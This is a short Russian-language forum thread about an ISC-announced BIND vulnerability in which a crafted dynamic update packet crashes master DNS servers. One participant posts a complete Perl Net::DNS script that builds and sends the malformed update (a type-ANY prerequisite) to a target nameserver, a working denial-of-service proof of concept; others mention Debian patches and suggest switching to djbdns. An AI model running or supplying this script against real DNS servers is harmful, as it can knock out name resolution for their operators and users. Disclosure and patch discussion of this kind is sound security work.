ISC анонсирует новую уязвимость BIND: Dynamic Update DoS

[unicast]

This vulnerability affects all servers that are masters for one or more zones – it is not limited to those that are configured to allow dynamic updates.

[walker]

Сервера, на которых динамический обновления не используются и запрещены, уязвимости, естественно, не подвержены.

не верно — даже если апдейты запрещены — уязвимость присутствует.(хотя редхат в багтрекере и заявил обратное)

вот скрипт, который генерит бажный пакет:

use Net::DNS;

our $NSI = '';
our $NSI_KEY_NAME = '';
our $NSI_KEY = '';

my $rzone = '';
my $rptr = «1.$rzone»;

my $packet = Net::DNS::Update->new($rzone);

$packet->push(
pre => Net::DNS::RR->new(
Name => $rptr,
Class => 'IN',
Type => 'ANY',
TTL => 0,
)
);
$packet->push(
update => Net::DNS::RR->new(
Name => $rptr,
Class => 'ANY',
Type => 'ANY',
)
);

$packet->sign_tsig( $NSI_KEY_NAME, $NSI_KEY ) if $NSI_KEY_NAME && $NSI_KEY;

print $packet->string;

Net::DNS::Resolver->new( nameservers => [$NSI] )->send($packet);

[unicast]

Для дебиана пакеты уже обновлены.

[powerman]

… причём обновляйтесь сразу на djbdns или любой другой нормальный dns-сервер, у которого нет такой богатой истории дыр в безопасности как у bind.

BIND, the Buggy Internet Name Daemon
Ease of use: BIND versus djbdns